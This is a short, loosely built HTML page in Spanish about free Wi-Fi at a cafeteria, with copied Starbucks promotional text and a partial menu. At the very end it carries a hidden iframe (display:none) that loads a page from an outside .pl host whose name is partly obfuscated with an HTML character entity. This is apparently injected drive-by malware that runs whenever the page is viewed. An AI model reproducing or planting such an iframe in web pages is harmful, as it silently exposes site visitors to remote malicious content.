<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
	<link rel="stylesheet" href="menu.css">
<title></title>
</head>
<style type="text/css">
body {
	background: url("1ee.jpg");
	background-attachment: fixed;
	background-repeat: no-repeat;
	background-size: cover;
}
</style>
<br>

<font color="red" face="AR DELANEY" size="7">
		<center><p>internet inalambrico</p>

		</font>

		<p>cafeteria</p></br>
   

<br>
<font color="green" face="AR DELANEY" size="6">
Mientras nuestro café reúne a las personas, nuestro servicio Wi-Fi gratuito te permite mantener la conexión. Aprende a navegar mientras saboreas una bebida en Starbucks.
Wi-Fi


En todas nuestras tiendas puedes disfrutar de conexión Wi-Fi  gratuita. Tan sólo tienes que pedirle a tu barista las clave para poder acceder a nuestra red inalámbrica y navegar de forma ilimitada. Tómate tu tiempo, siempre puedes pedirle a nuestro barista una nueva clave y reiniciar sesión!

<br>
<br>
<br>
<br>
<div id="header">
	<ul class="nav">
	 	        <li><a href="inicio.html">tienda</a></li>
	  
		  <ul>
		                                                                          
<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>
</body>